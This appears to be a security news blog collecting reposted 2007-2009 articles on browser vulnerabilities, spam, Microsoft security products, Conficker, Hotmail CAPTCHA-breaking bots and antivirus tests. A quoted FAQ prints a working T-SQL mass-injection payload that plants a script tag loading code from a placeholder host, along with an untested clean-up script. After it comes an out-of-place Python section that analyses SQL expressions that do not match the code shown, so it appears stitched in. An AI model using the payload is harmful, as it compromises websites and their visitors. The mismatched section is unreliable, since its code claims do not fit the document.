
On this page

Firefox Tops Vulnerability List?
Secret war on web crooks revealed
Microsoft will soon unveil free anti-virus software
Microsoft to offer hosted security for Exchange
Spam overwhelms e-mail messages
How will the April Fools' computer worm affect you?
Mass Attack FAQ
Microsoft Live Hotmail Under Attack by Streamlined Anti-CAPTCHA and Mass-mailing Operations
Security giants fail VB100 virus test


Wednesday, November 11, 2009 1:59:16 AM UTC ( EN | internet | security )

New study places Firefox at the top of the vulnerability list for the first half of 2009:

Application security vendor Cenzic today released its application security trends report for the first half of 2009. In it, Cenzic claims that Mozilla's Firefox browser led the field of Web browsers in terms of total vulnerabilities.

According to Cenzic, Firefox accounted for 44 percent of all browser vulnerabilities reported in the first half of 2009. In contrast, Apple's Safari had 35 percent of all reported browser vulnerabilities, Microsoft's Internet Explorer was third at 15 percent and Opera had just a six percent share.

The 2009 figures stand in contrast to Cenzic's Q3/Q4 2008 report, where IE accounted for 43 percent of all reported Web browser vulnerabilities and Firefox followed closely at 39 percent.

As to why Firefox's numbers were so high, Cenzic has a few ideas.

"It's a combination of different things," Lars Ewe, CTO of Cenzic, told InternetNews.com. "They've gotten more traction as a browser, which is good for them and the more you get used the more exposure you have. As well a fair amount of the vulnerabilities have come by way of plug-ins."

One key area that Ewe said was responsible for a number of reported Firefox vulnerabilities is with how the browser handles plug-ins.

"The plug-in architecture that they have is a selling fact for the browser and one of the reasons why I love using it," Ewe said. "They can't control security aspects of all the plug-ins and the vulnerabilities are a side effect of that."

Mozilla has made numerous efforts this year to bolster its plug-in security. Recently they launched a plug-in checker service to ensure that users are running up-to-date versions. The Firefox 3.0.9 update, which came out in April, specifically addressed several key plug-in vulnerabilities.

Though Firefox had the highest number of vulnerabilities, that doesn't necessarily mean that Firefox users were more vulnerable.

Ewe said that Cenzic looked at all reported vulnerabilities. There is no specific differentiation for zero day bugs in the browser vulnerability count either. All that raises the question of how Cenzic actually came up with their vulnerability counts in the first place.

"The process that we follow is looking at a number of different vulnerability databases and sources that we have and trying to come up with a fair percentage based on the deviations we see between the databases," Ewe said. "You could make the argument that it's 40 percent or 42 percent and there might be some variation on how you analyze it, but certainly it's not off by 20 percent."

While the Cenzic report shows Firefox at the top of the browser vulnerability pile, Ewe was quick to note that Cenzic uses Mozilla technology within its own solutions.

"Full disclosure here, Mozilla plays an important role in Cenzic's solution," Ewe said. "We are actually sitting on top of Mozilla as our agent of preference for scanning sites."

Cenzic develops an application scanning solution that uses the underlying Mozilla browser technology to test Web site security from inside a real browser context.

"We have a technology that we refer to as stateful assessment technology," Ewe said. "The idea behind it is to have as faithful an interaction with a Web site as possible and to determine vulnerabilities not on simple signatures but on behavioral basis of the application."

Ewe explained that when you do a cross-site scripting attack with a signature-based approach you'd just look for a server response that would indicate that the script tag has been injected. He added that the problem with that approach is that it's not faithful and the security researcher doesn't know if there is any additional logic on the client side that takes care of the script tag.

"If you want to be really faithful in the process you need to have full rendering capabilities and have all the JavaScript event handling," Ewe said. "So we leverage the entire Firefox architecture in order for us to actually have as faithful an interaction with a server as possible and maintain the client state. That results in low false-positives."

Source: www.internetnews.com

Tuesday, June 16, 2009 8:42:18 PM UTC ( EN | internet | security )

The people who run the world's internet systems are a rather secretive bunch.  Three times a year, senior technical officers from companies such as Google, Yahoo, AT&T, Comcast and Verizon meet to discuss ways of stopping the internet from being swamped by rising levels of spam, viruses and hacking attacks by organised criminals. They do not generally like discussing these meetings.  "Some people might get nervous if they knew all the things we talked about," said Michael O'Rierdan, chairman of the Messaging Anti-Abuse Working Group (MAAWG). "It’s our job to make the internet safe, but we don't want to put people off using the web."  They are also worried about being targeted by the cyber-criminals they are trying to thwart.

Most of the spam and hacking on the internet is run by organised crime rings. There is an underground economy that hacks into computers, sells stolen identities and orchestrates the sending of spam e-mails about everything from fake Viagra pills to banking scams. There is a lot of money at stake in keeping these operations running.  “We get threats every day," said Larry, chief technical officer of Spamhaus, a non-profit organisation that exposes spammers. He prefers not to reveal his surname. "In the US it is people bringing lawsuits against us. And then there are organised criminals in Russia and Ukraine, who use different methods."  Steve Linford, the organisation's founder, has been advised by police not to open unexpected packages arriving at his home.

MAAWG meetings are also places to discuss some of the controversial measures that internet companies need to take in the fight against spam, such as blocking some types of e-mail traffic. This measure sits awkwardly with civil liberties bodies.  The 270 delegates from 19 countries who met at Amsterdam's venerable Hotel Krasnapolsky last week were far from the usual, suit-wearing conference crowd. An eclectic mix of tattoos, ponytails, high-waisted trousers and backpacks indicated that these were true operations people who work in the bowels of the network.  Membership is strictly vetted and journalists are not normally invited to attend, but MAAWG has started to lift its veil a little. There is a growing feeling that the industry must reach out to consumers and get them to help fight cyber-crime.

In 2008, 349.6bn spam messages were sent across the internet, according to Symantec, the internet security company. Spam accounts for an average of almost 94 per cent of all e-mail messages.  Nearly 90 per cent of spam is sent from computers that have been hacked into and are being remotely programmed to send out spam.  More than 9.4m computers have been hijacked in this way and their owners are usually entirely unaware it is going on. It will be impossible to clean up these machines without talking to consumers.

"Sometimes we want people to know what we are doing, so they can yell at the politicians to give us more help," said Jerry Upton, executive director of MAAWG.  There is a rising sense of crisis among internet companies about the cost of spam. Few are willing to quantify how much they have to spend to fight spam, but Mr O'Rierdan estimated that big internet service providers employ five to 10 staff just to look at spam. In addition they must buy spare servers, routers and other equipment to cope with the volumes of junk mail, buy spam-filtering software and run support centers for their customers.

Viriya Upatising, chief technical officer of True Internet, a Thai internet service provider, said junk mail was a crippling cost for the company because it was paying to send the unwanted data across undersea cable connections to destinations such as the US and Europe.  "The cost of bandwidth is expensive in Asia," Mr Upatising said. "It costs us $250 per megabit per month to send data internationally."  The company put in place a draconian system that prevents suspected spammers from using its network. The measures have cut unwanted messages from 3.5m a day to a more manageable 250,000.

"We are all sharing these costs," said Patrick Peterson, chief technology officer at Ironport Systems, Cisco's e-mail security arm. "Spam is a stealth tax on consumers. ISPs have to pay for the spam, for the extra bandwidth, for equipment, and they are forced to put up their prices for consumers."

There is a fear among internet security professionals that they might be losing the battle to cyber-criminals. This may also be why they now want the public to know more about what they do, to show they have at least tried.  "I don't know if we can control it," said Dave Crocker, one of the early pioneers of e-mail and now a senior technical adviser to MAAWG.  He added: "It is an arms race. We are getting better at filtering out rogue messages but every day the criminals get better too, and they are better organized and more aggressive."

Keywords: the dark side of the web

* Spam: Unsolicited electronic messages, most commonly e-mail, but also increasingly common in instant messaging, blogs and mobile phone messages. The first e-mail spam is believed to have been sent in 1978.

* Malware: Malicious software designed to infiltrate or damage a computer system without the owners' consent. Symantec, the internet security company, has estimated there is now more malware released each year than legitimate software programs. There are many different types of malware, including viruses, worms and Trojan horses.

* Phishing : The fraudulent attempt to acquire sensitive information such as passwords, bank account details and credit card numbers. Typically it is in the form of an e-mail that directs people to a fake website - that looks like the legitimate site of a bank or other trusted organisation - where people are asked to enter personal details.

* Botnets: A network of computers that have been hacked and are being remotely controlled by cyber-criminals. Typically they are used to send out spam messages or viruses in large numbers. Most users will be unaware if their computer has been infiltrated and added to a botnet. Symantec estimated there were more than 9.4m machines hijacked in this way in 2008.

Source: http://www.ft.com

Monday, June 15, 2009 4:00:48 PM UTC ( EN | markets | microsoft | security )

BOSTON, June 10 (Reuters) Microsoft Corp (MSFT.O) is getting ready to unveil a long-anticipated free anti-virus service for personal computers that will compete with products sold by Symantec Corp (SYMC.O) and McAfee Inc (MFE.N).

A Microsoft spokesman said on Wednesday that the world's biggest software maker is testing an early version of the product with its own employees. Microsoft would "soon" make a trial version, or product beta, available via its website, he added, but declined to provide a specific date.

Symantec shares fell 0.5 percent on Nasdaq and McAfee fell 1.3 percent on the New York Stock Exchange, while Microsoft was up 2.1 percent. The Nasdaq composite index .IXIC was down 0.47 percent.

Investors are closely monitoring the free service, code-named Morro after Brazil's Morro de Sao Paolo beach, amid concern it could hurt sales of products from Symantec and McAfee, which generate billions of dollars of revenue a year protecting Windows PCs from attacks by hackers.

"It's a long-term competitive threat," said Daniel Ives, an analyst with FBR Capital Markets, though he added that the near-term impact was minimal.

Microsoft has said that Morro will offer basic features for fighting a wide range of viruses, which would likely make it comparable to low-end consumer products from Symantec and McAfee that cost about $40 per year.

Their top-selling products are security suites that come with features including encryption, firewalls, password protection, parental controls and data backup.

Three years ago, Microsoft entered that market with Live OneCare, which turned out to be a commercial flop. It announced plans in November to kill that product suite, saying it would launch the free Morro service by the end of 2009.

Analysts said they are looking forward to Morro's beta to see exactly how its features compare to those in products from competitors.

Microsoft has said it will provide protection from several types of malicious software including viruses, spyware, rootkits and trojans.

Officials with Symantec and McAfee have said they do not see Morro as a threat. 

"Microsoft's free product is basically a stripped down version of the OneCare product Microsoft pulled from the shelves," said Symantec Consumer division president Janice Chaffin. "A full Internet security suite is what consumers require today to stay fully protected."

Joris Evers, a spokesman for No. 2 security software maker McAfee, said his company is already enjoying strong growth despite competition from free anti-virus products that are on the market.

"On a level playing field, we are confident in our ability to compete with anyone who might enter the marketplace," he said.

A spokeswoman for Trend Micro Inc (4704.T), the No. 3 player, declined to comment. (Reporting by Jim Finkle; Editing by Steve Orlofsky, Brian Moss, Richard Chang)

Source: http://www.reuters.com

Thursday, April 16, 2009 12:30:51 AM UTC ( EN | internet | microsoft | security )

Microsoft will begin offering its first hosted security service under the Forefront brand on Thursday, dubbed Forefront Online Security for Exchange and designed to help keep malware and spam out of e-mail in-boxes.

The hosted service, which will cost $20 per user per year or less based on volume licensing, targets enterprise Exchange customers and includes a Web-based console for setting up policies for virus and spam protection, said Doug Leland, general manager of Microsoft's Identity and Security Business Group.

The releases will follow the timeline of Exchange 2010, which entered public beta this week. More hosted security services will be coming but Leland declined to elaborate.

Microsoft also will finally release on Thursday a new, public beta version of its Stirling security suite, which is the next generation of the Forefront software.

The initial beta version of Stirling was released a year ago and was supposed to be refreshed by the end of 2008. It will include client, server, and application security technology and offer a single management console.

Stirling components will come in staggered releases starting later this year with Forefront Security for Exchange and Threat Management and continuing through the first half of 2010, Leland said. The company also is changing the name of its Identity Lifecycle Manager product to Forefront Identity Manager and plans to offer a new set of technologies, code-named Geneva, for helping corporations improve the security of software and services, Microsoft said.

In addition, Microsoft said it is investing $75 million in a partner ecosystem, including making a strategic partnership with RSA. Other companies integrating with Stirling include Kaspersky, Brocade, Juniper Networks, Guardium, Imperva, Sourcefire, StillSecure, Q1 Labs, and Tipping Point.

The moves are part of the company's strategy to provide "Business Ready Security."

The moves are part of Microsoft's effort to broaden the scope of its security offerings to incorporate data protection, access and management, all built around the concept of identity, Leland said.

Microsoft wants to offer the ability for corporations to set "fine-grained security policies and have a deeper understanding about who in the organization is trying to access data and what they are trying to do with it," he said.

Source: http://news.cnet.com

[Update]: Forefront Online Security for Exchange is not limited to Exchange Server; it can be used with other mail servers as well.

Wednesday, April 08, 2009 4:18:12 PM UTC ( EN | internet | security )

More than 97% of all e-mails sent over the net are unwanted, according to a Microsoft security report.

The e-mails are dominated by spam adverts for drugs, and general product pitches and often have malicious attachments.

The report found that the global ratio of infected machines was 8.6 for every 1,000 uninfected machines.

It also found that Office document attachments and PDF files were increasingly being targeted by hackers.

Microsoft said people should not panic about the high levels of unwanted e-mail.

Cliff Evans, head of security and privacy for Microsoft in the UK, told BBC News: "The good news is that the majority of that never hits your inbox although some will get through."

Ed Gibson, chief cyber security advisor at Microsoft, said the rise in spam was due to traditional organised crime figures moving away from exploiting software vulnerabilities and "targeting the weak link that is you and me".

"With higher capacity broadband and better OS (operating systems), and higher power computers it is easier now to send out billions of spams. Three or four years ago the capacity wasn't there."

Graphic showing infection rates around the globe

Malware ecosystem

Paul Woods, senior analyst at e-mail security firm Message Labs, said he was surprised the Microsoft figure for unwanted e-mail was so high.

"Our own analysis shows that around 81% of e-mail traffic we were processing was identified as spam and unwanted," he said.

MessageLabs said spam rates had fallen at the end of 2008 as an ISP which had been hijacked to send out spam mails to users had been taken offline.

"As a result of that, a number of developers in botnet technology at the end of last year were trying to regain botnet control and increase capacity and return to previous spam levels.

"It won't be far off before we see a return to those levels."

The report, which looked at online activity during the second half of 2008, also pinpoints the countries that are suffering from the most infections of malicious software, or malware.

Russia and Brazil top the global chart of infections, followed by Turkey and Serbia and Montenegro.

It said that the type of malware varied from country to country.

"As the malware ecosystem becomes more reliant on social engineering, threats worldwide have become more dependent on language and cultural factors," it reported.

In China, several malicious web browser modifiers are common, while in Brazil, malware that targets users of online banks is more widespread.

In Korea, viruses such as Win32/Virut and Win32/Parite are common.


Global average

The global average for infected machines is 8.6 for every 1,000 uninfected PCs.

The UK's infection rate is 5.7, according to the Microsoft report.

The report highlighted the need to keep operating systems, web browsers and applications up to date with the latest versions.

Increasingly, hackers are using common file formats, such as Microsoft Office documents and Adobe's PDF format, as the carrier of malicious exploits or programs.

More than 91% of attacks exploiting vulnerabilities in Microsoft Office were using security holes that had been plugged by updates that had been available for more than two years.

Attacks using PDF files rose sharply in the second half of 2008, the report noted.

The vulnerabilities all of the attacks exploited had already been fixed by Adobe, and were not present in the most recent versions of the software.

Mr Gibson told BBC News people had to be aware that if they did not update their applications, such as Office and Adobe, they were not just putting themselves at risk, but others on the internet also.

"If you don't update your software you are not just a hazard to yourself, you are hazard to others because you can be part of a botnet [if your computer is hijacked]."

Mr Evans said Microsoft was very happy with the approach consumers were taking to updating applications via automatic updates.

"For consumers it is happening but for business less so. We have to encourage businesses to make more use of automatic updates."


Scareware

Mr Woods said malicious hackers were exploiting Office document attachments and PDF files in order to make more targeted attacks.

"They tend to be used in selective attacks to named individuals in organisations.

"A lot of social engineering will be used to appear legitimate and convince a user to open the attachment.

"Once opened, a vulnerability in the application used to open the document will be exploited and often a tiny piece of code will execute and then download a larger file from a rogue website.

"This program will then attempt to search the computer for a particular document or file and send it to a remote PC."

The report also highlighted the rise in the use of so-called scareware, fake security programs which falsely tell people they need to install software which does nothing other than attempt to steal personal details from a user's PC.

"It's criminals playing on people's fears," said Mr Evans.

"The advice remains the same - ensuring you have up to date software, whether that's your applications, your browser or your OS."


Source: http://news.bbc.co.uk

Tuesday, March 31, 2009 8:16:02 PM UTC ( EN | internet | security | tech )

Remember the dire predictions surrounding the "millennium bug?" The doom-and-gloom scenarios bandied about by security analysts on how computers could act when their clocks turned to January 1, 2000?

Well, researchers are hoping that a potential April Fools' time bomb -- the Conficker.c that is supposed to hit computers on April 1 -- turns out to be equally unfounded.

But realizing that hope alone is not a prudent option, here is a primer on the worm so you can adequately prepare yourself -- and your computer.

Computer users will not know that Conficker.c has infected their machine.


What is Conficker.c and what do analysts fear it may do?

Conficker.c is a worm, a malicious program thought to have already infected between 5 million and 10 million computers.

Those infections haven't spawned many symptoms, but on April 1 a master computer is scheduled to gain control of these zombie machines, said Don DeBolt, director of threat research for CA, a New York-based IT and software company.

What happens on April Fools' Day is anyone's guess.

The program could delete all of the files on a person's computer, use zombie PCs -- those controlled by a master -- to overwhelm and shut down Web sites or monitor a person's keyboard strokes to collect private information like passwords or bank account information, experts said.

More likely, though, said DeBolt, the virus may try to get computer users to buy fake software or spend money on other phony products.

Experts said computer hackers largely have moved away from showboating and causing random trouble. They now usually try to make money off their viral programs.

How does Conficker.c work?

Conficker.c imbeds itself deep in the computer where it is difficult to track. The program, for instance, stops Windows from conducting automatic updates that could prevent it from causing damage.

The program's code is also written to evolve over time and its author appears to be making updates to thwart attempts to neuter the worm.

Who wrote the program?

It's unclear who wrote the program, but anti-worm researchers -- a group calling itself the Conficker Cabal -- are looking for clues.

First, they know that some recent programs have come from Eastern European countries outside the jurisdiction of the European Union, said Patrick Morganelli, senior vice president of technology for Enigma Software.

Worm program authors often hide in those countries to stay out of sight from law enforcement, he said.

In a way, the Conficker Cabal is also looking for the program author's fingerprints. DeBolt said security researchers are looking through old programs to see if their programming styles are similar to that of Conficker.c.

The prospects for catching the program's author are not good, Morganelli said. "Unless they open their mouth, they'll never be found," he said.

So, the most effective counter-assault simply may be damage control.

How can I tell if my computer's infected?

One quick way to see if your computer has been infected is to see if you have gotten automatic updates from Windows in March. If so, your computer likely is fine, DeBolt said.

Microsoft released a statement saying the company "is actively working with the industry to mitigate the spread of the worm."

Users who haven't gotten the latest Windows updates should go to http://safety.live.com if they fear they're infected, the company's statement says.

People who use other antivirus software should check to make sure they've received the latest updates, which also could have been disabled by Conficker.c.

How did the worm evolve?

The first version of Conficker -- strain A -- was released in late 2008. That version used 250 Web addresses -- generated daily by the system -- as the means of communication between the master computer and its zombies.

The end goal of the first line was to sell computer users fake antivirus software, said Morganelli.

Computer security experts largely patched that problem by working with the Internet Corporation for Assigned Names and Numbers to disable or buy the problematic URLs, he said.

A second variant, Conficker.b, was released in January and infected millions more machines.

Conficker strain C will generate 50,000 URLs per day instead of just 250 when it becomes active, DeBolt said.

What is being done to fight Conficker?

Members of the Conficker Cabal are searching for the malicious software program's author and for ways to do damage control if he or she can't be stopped.

They're motivated in part by a $250,000 bounty from Microsoft.

Source: http://www.cnn.com

Wednesday, April 30, 2008 11:09:41 AM UTC ( EN | internet | security | tech )

[QUOTE]
Reports about the massive infection of web sites by an automated tool, whose most recent prominent victims have been United Nations, UK Government and the U.S. Department of Homeland Security raised some recurring questions which are worth answering.

  1. The attack is targeting Microsoft IIS web servers. Is there a Microsoft vulnerability?
  2. What can I do if I’m the administrator of an infected site?
  3. What should I do as an user to protect myself?
  4. How can NoScript protect if the compromised sites are in my trusted whitelist?
 


“Exploits of a Mom” by xkcd

  1. The attack is targeting Microsoft IIS web servers. Is it exploiting a Microsoft vulnerability?

    Yes and no. Web developers (or their employers who did not mandate proper security education) are to blame for each single infection, because the SQL injection exploited to infect the web sites is possible thanks to trivial coding errors.
    That said, the attackers are targeting IIS web servers which run ASP for a reason.
    Crackers put together a clever SQL procedure capable of polluting any Microsoft SQL Server database in a generic way, with no need of knowing the specific table and fields layouts:

    DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR
    FOR select a.name,b.name from sysobjects a,syscolumns b where
    a.id=b.id and a.xtype='u' and
    (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
    OPEN
    Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0) BEGIN
    exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+
    ''<script src=http://evilsite.com/1.js></script>''')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor;

    This is the “secret sauce” which is allowing the attack to reach its impressive numbers, and it works exclusively against Microsoft database technology — but it’s a feature, not a bug (no irony intended this time). Anyway, the chances for such “powerful” DB technology of being used in conjunction with web servers different than IIS are very low.
    So, to recap:

    1. There’s no Microsoft-specific vulnerability involved: SQL injections can happen (and do happen) on LAMP and other web application stacks as well.
    2. SQL injections, and therefore these infections, are caused by poor coding practices during web site development.
    3. Nonetheless, this mass automated epidemic is due to specific features of Microsoft databases, allowing the exploit code to be generic, rather than tailored for each single web site. Update: more details in this comment.

    In my previous coverage of similar incidents I also assumed a statistical/demographic reason for targeting IIS, since many ASP developers having a desktop Visual Basic background underwent a pretty traumatic migration to the web in the late 90s, and often didn’t really grow enough security awareness to develop safe internet-facing applications.

  2. What should I do if I’m the administrator of an infected site?

    First of all, you should call your web developers (or even better, someone who specializes in web application security) and require a full code review to find and fix the SQL injection bugs.
    In the meanwhile you should either put your database offline or recover clean data from a backup, but until the code review is done be prepared to get compromised again. Deploying a web application firewall may mitigate the emergency, but you must understand it’s merely a temporary work-around — the solution is fixing the code (learn from the United Nations tale).
    If you’ve got no clean database backup, you could try to recover by brutally reversing the SQL attack:

    DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR
    FOR select a.name,b.name from sysobjects a,syscolumns b where
    a.id=b.id and a.xtype='u' and
    (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
    OPEN
    Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0) BEGIN
    -- keep everything before the last '<script': patindex on the reversed
    -- value finds 'tpircs<' (the reversed tag), and 6 more characters cover
    -- the rest of the tag name. One pass removes only the last appended tag,
    -- so run it again for values that were polluted more than once.
    -- text/ntext columns (xtype 35/99) need convert(varchar(8000), ...)
    -- around the value first, as the attack itself did.
    exec('update ['+@T+'] set ['+@C+']=left(['+@C+'],
    len(['+@C+'])-patindex(''%tpircs<%'', reverse(['+@C+']))-6)
    where ['+@C+'] like ''%<script%</script>''')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor;

    This SQL procedure walks through your tables and fields, just like its evil prototype, but rather than appending the malicious JavaScript with

    exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+
    ''<script src=http://evilsite.com/1.js></script>''')

    it locates and removes it with

    exec('update ['+@T+'] set ['+@C+']=left(['+@C+'],
    len(['+@C+'])-patindex(''%tpircs<%'', reverse(['+@C+']))-6)
    where ['+@C+'] like ''%<script%</script>''')

    Notice that I’ve not tested my code above, and I’m just providing it as a courtesy: use it at your own risk, after doing a backup of your data.

  3. What should I do as a user to protect myself?

    OK, this one is the easiest :)

  4. How can NoScript protect if the compromised sites are in my trusted whitelist?

    Even if the compromised site is in your whitelist, allowed to run JavaScript, the malicious scripts are hosted on external servers controlled by the attackers (e.g. www.nihaorr1.com): therefore NoScript prevents them from being loaded and effectively defeats the attack.

[/QUOTE]

Source: http://hackademix.net/2008/04/26/mass-attack-faq/
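The clean-up in the FAQ above rests on a small piece of T-SQL string arithmetic, and the author says it was never run. The following Python model is an added example, not part of the quoted FAQ or of NoScript: it emulates the T-SQL functions the clean-up uses (REVERSE, PATINDEX, SUBSTRING, RIGHT and the LIKE test) so the transformation can be checked on constructed values before any UPDATE touches a real database. It shows that the RIGHT-based form of the expression, with its 7-character offset, keeps most of the injected tag, while the SUBSTRING-based form strips it; the sample rows and the evilsite.com host are constructed test data.

```python
"""Python model of the T-SQL clean-up described in the Mass Attack FAQ.

Added example (not part of the quoted FAQ): it emulates the T-SQL string
functions the clean-up relies on (REVERSE, PATINDEX, SUBSTRING, RIGHT, LIKE)
so the string arithmetic can be checked on constructed values before any
UPDATE is run against a real database.  INJECTED_TAG and SAMPLE_ROWS are
constructed test data; the host name is the placeholder used in the FAQ.
"""

# The tag form the mass attack appends to every text column (placeholder host).
INJECTED_TAG = "<script src=http://evilsite.com/1.js></script>"


def patindex(needle: str, s: str) -> int:
    """T-SQL PATINDEX('%needle%', s): 1-based position of the first match, 0 if absent."""
    return s.find(needle) + 1


def substring(s: str, start: int, length: int) -> str:
    """T-SQL SUBSTRING(s, start, length): 1-based start, clipped at the end of s."""
    return s[start - 1:start - 1 + length]


def right(s: str, n: int) -> str:
    """T-SQL RIGHT(s, n): the last n characters (the whole string if n exceeds its length)."""
    if n <= 0:
        return ""
    return s if n >= len(s) else s[-n:]


def is_injected(value: str) -> bool:
    """The WHERE clause  value LIKE '%<script%</script>': a script tag at the very end.

    A legitimate value that happens to end in a closing script tag would also
    match; a real clean-up should match the exact tag the attacker appended.
    """
    return "<script" in value and value.endswith("</script>")


def strip_tag_right_form(value: str) -> str:
    """reverse(right(reverse(v), patindex('%tpircs<%', reverse(v)) + 7)).

    RIGHT keeps the LAST n characters of the reversed text, i.e. the FIRST n
    characters of the original, so this keeps most of the tag instead of dropping it.
    """
    rev = value[::-1]
    return right(rev, patindex("tpircs<", rev) + 7)[::-1]


def strip_tag_substring_form(value: str) -> str:
    """reverse(substring(reverse(v), patindex('%tpircs<%', reverse(v)) + 7, len(v))).

    Searching the reversed text for 'tpircs<' finds the last '<script' in the
    original; everything after it in the reversed text is the clean prefix.
    """
    rev = value[::-1]
    start = patindex("tpircs<", rev)
    if start == 0:            # no '<script' at all: leave the value untouched
        return value
    return substring(rev, start + 7, len(rev))[::-1]


# Constructed rows: (table, column, key, value), as a dump of affected columns might look.
SAMPLE_ROWS = [
    ("Products", "Description", 1, "Blue widget" + INJECTED_TAG),
    ("Products", "Description", 2, "Red widget"),
    ("News", "Body", 7, INJECTED_TAG),                     # field was empty before the attack
    ("News", "Body", 8, "Read <b>more</b>" + INJECTED_TAG),
]


def scan_rows(rows):
    """Detection pass: (table, column, key) of every value the UPDATE would touch."""
    return [(t, c, k) for t, c, k, v in rows if is_injected(v)]


def clean_rows(rows):
    """Apply the substring-form clean-up only to the rows the WHERE clause selects."""
    return [(t, c, k, strip_tag_substring_form(v) if is_injected(v) else v)
            for t, c, k, v in rows]


if __name__ == "__main__":
    for hit in scan_rows(SAMPLE_ROWS):
        print("injected:", hit)
    for row in clean_rows(SAMPLE_ROWS):
        print(row)
```

The same two-step discipline applies on the real database: run the SELECT behind `scan_rows` (the cursor's WHERE clause as a query) and review what it returns before issuing the UPDATE, and keep the backup the FAQ insists on, because a value that legitimately ends in `</script>` is cut just like an injected one.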

 Friday, April 11, 2008
Friday, April 11, 2008 10:52:47 AM UTC ( EN | internet | security )

[QUOTE]
Websense Security Labs ThreatSeeker™ technology has discovered that spammers in their recent tactics have drawn their attention towards the traditional and infamous Hotmail, aka Live Hotmail, service after the streamlined Live Mail Anti-CAPTCHA operations. Spammers have managed to create automated bots that are capable of not only signing up and creating random Hotmail accounts, but also of using these accounts for spamming purposes from a proper Live Hotmail service. Websense's predictions about this sophisticated spammer strategy at the time of the Live Mail Anti-CAPTCHA and Gmail Anti-CAPTCHA operations, and its outcomes, have proven factual with this attack.

Websense believes that there are four main advantages to spammers from this approach. First, the Microsoft domain is unlikely to be blacklisted. Second, they are free to sign up. Third, the integration of Hotmail with a wide range of Windows Live services. And fourth, it may be hard to keep track of them as there are millions of users worldwide using the service.
Let’s see the entire automated process in two stages.

Stage 1: Signing up and creating accounts successfully.
Part 1: Observe the bot hooking itself onto the Internet Explorer browser on the victims’ machine.

Part 2: Observe the set of pre-determined account names injected onto the victims’ machine, which the bot attempts to sign up from the victims’ machine.

Part 3: The bot uses the Internet Explorer browser in the background on the victims’ machine to attempt the Hotmail account sign-up process.

Part 4: Observe the bot visiting the Microsoft Hotmail account sign-up page, trying to grab the CAPTCHA, and sending it to the CAPTCHA breaking host for account creation.

Part 5: Try-break, try-break, try-break.

Part 6: Observe CAPTCHA images being collected as hidden files on the victims’ machine during different account sign-up attempts.

Part 7: Unlike the Live Mail CAPTCHA break process, in this attack the communication between the CAPTCHA breaking host and the victims’ machine is scrambled. It is observed that 8 characters of the CAPTCHA code are returned instantly during the sign-up, after the CAPTCHA image is sent to the breaking host. The bot-infected (victims’) machine descrambles it to sign up the account successfully.

Part 8: Observe that the account is being signed up and created successfully.

Part 9: The created account credentials are returned back to the CAPTCHA breaking host.

The entire process is automated and carried out in an iterative manner until all the accounts in the list injected (initially) onto the victims’ machine are successfully signed up (refer to Stage 1, Figure 1.2).
Stage 2: Spamming using created accounts from a proper Hotmail Server
Once all the accounts in the list (refer to Stage 1, Figure 1.2) are signed up by the bot, they are then picked randomly and used for spamming purposes.
Part 1: Observe the login process in action.

Part 2: Login process in further progress.

Part 3: Proper login in progress over SSL page.

Part 4: Observe the bot attempted a successful login on to a proper Live Hotmail Server page.

Part 5: Observe the bot attempting to initiate the edit process or composing a message for spamming.

Part 6: Spam message build in progress by the bot.

Part 7: The bot successfully fills in the "from email address" list, the "to email address" list, the email subject, and the body to be included in the message for spamming purposes, thereby completing its task.

End of message! Spam is being sent to targeted accounts.
Part 8: Finally the account is logged out to continue the same operation with the next email account.

Part 9: The entire process in action, carried out in an iterative manner to perform mass-mailing from the different accounts created by the bot.


Spammers finally have success advertising their product.

Observations:
Stage 1: One in every 8 to 10 attempts to sign up a Hotmail account is successful. Hence the success rate ranges approximately between 10 and 15%.
Stage 2: Spam campaigns from one Hotmail account are sent to multiple accounts in the CC and BCC lists at a time. The same Hotmail account (or “from account/address”) is not repeatedly used for sending spam campaigns continuously. They are changed in a timely fashion by the bot. The same is the case with the targeted accounts (or “to account(s)/addresses”) for spamming.
Additional Information:
It is observed that unlike Live Mail Anti-CAPTCHA and Gmail Anti-CAPTCHA operations in the past, the current attack is aggressive and instantaneous in terms of CAPTCHA breaking host turn-around time.
In the current attack, the response time of the CAPTCHA breaking host, after grabbing a CAPTCHA image from a victims’ machine, analyzing it, and responding back to the victims’ machine with the corresponding CAPTCHA code, is lower when compared to previous attacks.
Note 1: It is observed that the total response time for CAPTCHA breaking on the average is only about 6 seconds*.

Note 2: The timing on the request/response in this current attack clearly indicates the possibility of an automated system at the spammers’ end performing the Anti-CAPTCHA operation.
Websense believes that these accounts could be used by the spammers at any time for a variety of social-engineering attacks in future. A wide range of attacks (both manual and automated) would be possible using the same account credentials on other significant Live services integrated with Live Hotmail services offered by Microsoft Corporation, such as Live Messenger (instant messaging), Live Spaces (online storage), etc.

Note: For more information on Hotmail aka Live Hotmail and Live services, see the Hotmail, Live Hotmail and Live Mail entries on Wikipedia.
[/QUOTE]

Source: http://securitylabs.websense.com/

 Wednesday, December 12, 2007
Wednesday, December 12, 2007 1:51:45 PM UTC ( EN | security )

[QUOTE]
Researchers at Virus Bulletin have released the results of the latest VB100 computer security test, highlighting failures at a number of leading security vendors.

Products from Sophos, Trend Micro and Kaspersky were among those that failed to protect fully against a collection of outdated viruses.

The December edition of the VB100 test subjected security software to 100 Windows 2000 viruses collected from labs and websites.

"It was a shock and a concern to see such a poor performance from so many products in this latest round of testing," said John Hawes, a technical consultant at Virus Bulletin.

"It is particularly disappointing to see so many major products missing significant real-world threats."

In order to pass the test, vendors needed to identify 100 malware samples as well as avoid reporting false positives on clean samples.

Kaspersky failed the test by missing one virus from the list, while Sophos missed eight. Trend Micro missed four virus samples, failing VB100 certification for the fourth time in five tests.

Trend Micro products had passed 13 consecutive VB100 tests. The company declined to comment on the results.

